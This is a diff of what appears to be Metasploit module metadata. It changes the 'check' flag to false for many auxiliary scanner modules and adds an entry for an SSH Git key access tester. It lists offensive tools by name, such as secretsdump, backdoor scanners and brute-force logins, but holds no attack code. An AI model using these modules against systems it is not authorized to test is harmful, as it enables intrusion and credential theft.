    "ref_name": "scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38382,7 +38614,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_eps_get_directory_listing",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38431,7 +38663,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_pfl_check_os_file_existence",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38478,7 +38710,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_ping",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38525,7 +38757,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_read_table",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38573,7 +38805,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_rzl_read_dir",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38620,7 +38852,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_susr_rfc_user_interface",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38667,7 +38899,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_sxpg_call_system_exec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38714,7 +38946,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_sxpg_command_exec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38763,7 +38995,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_system_info",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38810,7 +39042,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_th_saprel_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38856,7 +39088,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_web_gui_brute_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -38894,7 +39126,7 @@
    "path": "/modules/auxiliary/scanner/scada/digi_addp_reboot.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/digi_addp_reboot",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38932,7 +39164,7 @@
    "path": "/modules/auxiliary/scanner/scada/digi_addp_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/digi_addp_version",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38970,7 +39202,7 @@
    "path": "/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/digi_realport_serialport_scan",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39008,7 +39240,7 @@
    "path": "/modules/auxiliary/scanner/scada/digi_realport_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/digi_realport_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39058,7 +39290,7 @@
    "path": "/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/indusoft_ntwebserver_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39096,7 +39328,7 @@
    "path": "/modules/auxiliary/scanner/scada/koyo_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/koyo_login",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39213,7 +39445,7 @@
    "path": "/modules/auxiliary/scanner/scada/modbusdetect.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/modbusdetect",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39252,7 +39484,7 @@
    "path": "/modules/auxiliary/scanner/scada/moxa_discover.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/moxa_discover",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39369,7 +39601,7 @@
    "path": "/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/sielco_winlog_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39406,7 +39638,7 @@
    "path": "/modules/auxiliary/scanner/sip/enumerator.rb",
    "is_install_path": true,
    "ref_name": "scanner/sip/enumerator",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39443,7 +39675,7 @@
    "path": "/modules/auxiliary/scanner/sip/enumerator_tcp.rb",
    "is_install_path": true,
    "ref_name": "scanner/sip/enumerator_tcp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39480,7 +39712,7 @@
    "path": "/modules/auxiliary/scanner/sip/options.rb",
    "is_install_path": true,
    "ref_name": "scanner/sip/options",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39517,7 +39749,7 @@
    "path": "/modules/auxiliary/scanner/sip/options_tcp.rb",
    "is_install_path": true,
    "ref_name": "scanner/sip/options_tcp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39592,11 +39824,11 @@

    ],
    "targets": null,
-    "mod_time": "2018-08-27 16:06:07 +0000",
+    "mod_time": "2019-10-31 14:15:32 +0000",
    "path": "/modules/auxiliary/scanner/smb/impacket/dcomexec.py",
    "is_install_path": true,
    "ref_name": "scanner/smb/impacket/dcomexec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -39644,11 +39876,11 @@

    ],
    "targets": null,
-    "mod_time": "2018-08-27 16:06:07 +0000",
+    "mod_time": "2019-10-31 14:15:32 +0000",
    "path": "/modules/auxiliary/scanner/smb/impacket/secretsdump.py",
    "is_install_path": true,
    "ref_name": "scanner/smb/impacket/secretsdump",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -39685,11 +39917,11 @@

    ],
    "targets": null,
-    "mod_time": "2018-08-27 16:06:07 +0000",
+    "mod_time": "2019-10-31 14:15:32 +0000",
    "path": "/modules/auxiliary/scanner/smb/impacket/wmiexec.py",
    "is_install_path": true,
    "ref_name": "scanner/smb/impacket/wmiexec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -39731,7 +39963,7 @@
    "path": "/modules/auxiliary/scanner/smb/pipe_auditor.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/pipe_auditor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39770,7 +40002,7 @@
    "path": "/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/pipe_dcerpc_auditor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39812,7 +40044,7 @@
    "path": "/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/psexec_loggedin_users",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39849,7 +40081,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb1.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb1",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39886,7 +40118,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb2.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb2",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39929,7 +40161,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb_enum_gpp.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enum_gpp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39972,7 +40204,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb_enumshares.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumshares",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40011,7 +40243,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumusers",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40051,7 +40283,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumusers_domain",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40093,7 +40325,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -40132,7 +40364,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb_lookupsid.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_lookupsid",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40181,7 +40413,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb_ms17_010.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_ms17_010",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40269,7 +40501,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40315,7 +40547,7 @@
    "path": "/modules/auxiliary/scanner/smtp/smtp_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/smtp/smtp_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40358,7 +40590,7 @@
    "path": "/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb",
    "is_install_path": true,
    "ref_name": "scanner/smtp/smtp_ntlm_domain",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40403,7 +40635,7 @@
    "path": "/modules/auxiliary/scanner/smtp/smtp_relay.rb",
    "is_install_path": true,
    "ref_name": "scanner/smtp/smtp_relay",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40446,7 +40678,7 @@
    "path": "/modules/auxiliary/scanner/smtp/smtp_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/smtp/smtp_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40484,7 +40716,7 @@
    "path": "/modules/auxiliary/scanner/snmp/aix_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/aix_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40522,7 +40754,7 @@
    "path": "/modules/auxiliary/scanner/snmp/arris_dg950.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/arris_dg950",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40559,7 +40791,7 @@
    "path": "/modules/auxiliary/scanner/snmp/brocade_enumhash.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/brocade_enumhash",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40597,7 +40829,7 @@
    "path": "/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/cisco_config_tftp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40635,7 +40867,7 @@
    "path": "/modules/auxiliary/scanner/snmp/cisco_upload_file.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/cisco_upload_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40673,7 +40905,7 @@
    "path": "/modules/auxiliary/scanner/snmp/cnpilot_r_snmp_loot.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/cnpilot_r_snmp_loot",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40712,7 +40944,7 @@
    "path": "/modules/auxiliary/scanner/snmp/epmp1000_snmp_loot.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/epmp1000_snmp_loot",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40749,7 +40981,7 @@
    "path": "/modules/auxiliary/scanner/snmp/netopia_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/netopia_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40788,7 +41020,7 @@
    "path": "/modules/auxiliary/scanner/snmp/sbg6580_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/sbg6580_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40827,7 +41059,7 @@
    "path": "/modules/auxiliary/scanner/snmp/snmp_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40868,7 +41100,7 @@
    "path": "/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_enum_hp_laserjet",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40905,7 +41137,7 @@
    "path": "/modules/auxiliary/scanner/snmp/snmp_enumshares.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_enumshares",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40942,7 +41174,7 @@
    "path": "/modules/auxiliary/scanner/snmp/snmp_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_enumusers",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40979,7 +41211,7 @@
    "path": "/modules/auxiliary/scanner/snmp/snmp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -41018,7 +41250,7 @@
    "path": "/modules/auxiliary/scanner/snmp/snmp_set.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_set",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41055,7 +41287,7 @@
    "path": "/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/ubee_ddw3611",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41092,7 +41324,7 @@
    "path": "/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/xerox_workcentre_enumusers",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41129,7 +41361,7 @@
    "path": "/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/apache_karaf_command_execution",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -41168,7 +41400,7 @@
    "path": "/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/cerberus_sftp_enumusers",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41206,7 +41438,7 @@
    "path": "/modules/auxiliary/scanner/ssh/detect_kippo.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/detect_kippo",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41246,7 +41478,7 @@
    "path": "/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/eaton_xpert_backdoor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41288,7 +41520,7 @@
    "path": "/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/fortinet_backdoor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41328,7 +41560,7 @@
    "path": "/modules/auxiliary/scanner/ssh/juniper_backdoor.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/juniper_backdoor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41369,7 +41601,7 @@
    "path": "/modules/auxiliary/scanner/ssh/karaf_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/karaf_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -41408,7 +41640,44 @@
    "path": "/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/libssh_auth_bypass",
-    "check": true,
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "auxiliary_scanner/ssh/ssh_enum_git_keys": {
+    "name": "Test SSH Github Access",
+    "fullname": "auxiliary/scanner/ssh/ssh_enum_git_keys",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Wyatt Dahlenburg ( <Wyatt Dahlenburg (@wdahlenb)>"
+    ],
+    "description": "This module will attempt to test remote Git access using\n          (.ssh/id_* private keys). This works against GitHub and\n          GitLab by default, but can easily be extended to support\n          more server types.",
+    "references": [
+      "URL-https://help.github.com/en/articles/testing-your-ssh-connection"
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2019-11-27 11:18:01 +0000",
+    "path": "/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/ssh/ssh_enum_git_keys",
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41456,7 +41725,7 @@
    "path": "/modules/auxiliary/scanner/ssh/ssh_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_enumusers",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41495,7 +41764,7 @@
    "path": "/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_identify_pubkeys",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -41532,7 +41801,7 @@
    "path": "/modules/auxiliary/scanner/ssh/ssh_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -41570,7 +41839,7 @@
    "path": "/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_login_pubkey",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -41607,7 +41876,7 @@
    "path": "/modules/auxiliary/scanner/ssh/ssh_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41660,7 +41929,7 @@
    "path": "/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py",
    "is_install_path": true,
    "ref_name": "scanner/ssl/bleichenbacher_oracle",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41707,7 +41976,7 @@
    "path": "/modules/auxiliary/scanner/ssl/openssl_ccs.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssl/openssl_ccs",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41803,7 +42072,7 @@
    "path": "/modules/auxiliary/scanner/steam/server_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/steam/server_info",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41840,7 +42109,7 @@
    "path": "/modules/auxiliary/scanner/telephony/wardial.rb",
    "is_install_path": true,
    "ref_name": "scanner/telephony/wardial",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41877,7 +42146,7 @@
    "path": "/modules/auxiliary/scanner/telnet/brocade_enable_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/brocade_enable_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -41914,7 +42183,7 @@
    "path": "/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/lantronix_telnet_password",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41952,7 +42221,7 @@
    "path": "/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/lantronix_telnet_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41991,7 +42260,7 @@
    "path": "/modules/auxiliary/scanner/telnet/satel_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/satel_cmd_exec",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42032,7 +42301,7 @@
    "path": "/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/telnet_encrypt_overflow",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42069,7 +42338,7 @@
    "path": "/modules/auxiliary/scanner/telnet/telnet_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/telnet_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -42109,7 +42378,7 @@
    "path": "/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/telnet_ruggedcom",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -42146,7 +42415,7 @@
    "path": "/modules/auxiliary/scanner/telnet/telnet_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/telnet_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42180,11 +42449,11 @@

    ],
    "targets": null,
-    "mod_time": "2018-08-27 16:06:07 +0000",
+    "mod_time": "2019-11-01 19:20:22 +0000",
    "path": "/modules/auxiliary/scanner/teradata/teradata_odbc_login.py",
    "is_install_path": true,
    "ref_name": "scanner/teradata/teradata_odbc_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -42230,7 +42499,7 @@
    "path": "/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb",
    "is_install_path": true,
    "ref_name": "scanner/tftp/ipswitch_whatsupgold_tftp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42270,7 +42539,7 @@
    "path": "/modules/auxiliary/scanner/tftp/netdecision_tftp.rb",
    "is_install_path": true,
    "ref_name": "scanner/tftp/netdecision_tftp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42307,7 +42576,7 @@
    "path": "/modules/auxiliary/scanner/tftp/tftpbrute.rb",
    "is_install_path": true,
    "ref_name": "scanner/tftp/tftpbrute",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42346,7 +42615,7 @@
    "path": "/modules/auxiliary/scanner/ubiquiti/ubiquiti_discover.rb",
    "is_install_path": true,
    "ref_name": "scanner/ubiquiti/ubiquiti_discover",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42384,7 +42653,7 @@
    "path": "/modules/auxiliary/scanner/udp/udp_amplification.rb",
    "is_install_path": true,
    "ref_name": "scanner/udp/udp_amplification",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42422,7 +42691,7 @@
    "path": "/modules/auxiliary/scanner/upnp/ssdp_amp.rb",
    "is_install_path": true,
    "ref_name": "scanner/upnp/ssdp_amp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42463,7 +42732,7 @@
    "path": "/modules/auxiliary/scanner/upnp/ssdp_msearch.rb",
    "is_install_path": true,
    "ref_name": "scanner/upnp/ssdp_msearch",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42504,7 +42773,7 @@
    "path": "/modules/auxiliary/scanner/varnish/varnish_cli_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/varnish/varnish_cli_file_read",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42545,7 +42814,7 @@
    "path": "/modules/auxiliary/scanner/varnish/varnish_cli_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/varnish/varnish_cli_login",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42591,7 +42860,7 @@
    "path": "/modules/auxiliary/scanner/vmware/esx_fingerprint.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/esx_fingerprint",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42628,7 +42897,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmauthd_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmauthd_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -42666,7 +42935,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmauthd_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmauthd_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42712,7 +42981,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_enum_permissions",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -42758,7 +43027,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_enum_sessions",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -42804,7 +43073,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_enum_users.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_enum_users",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -42850,7 +43119,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_enum_vms",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -42896,7 +43165,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_host_details.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_host_details",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -42942,7 +43211,7 @@
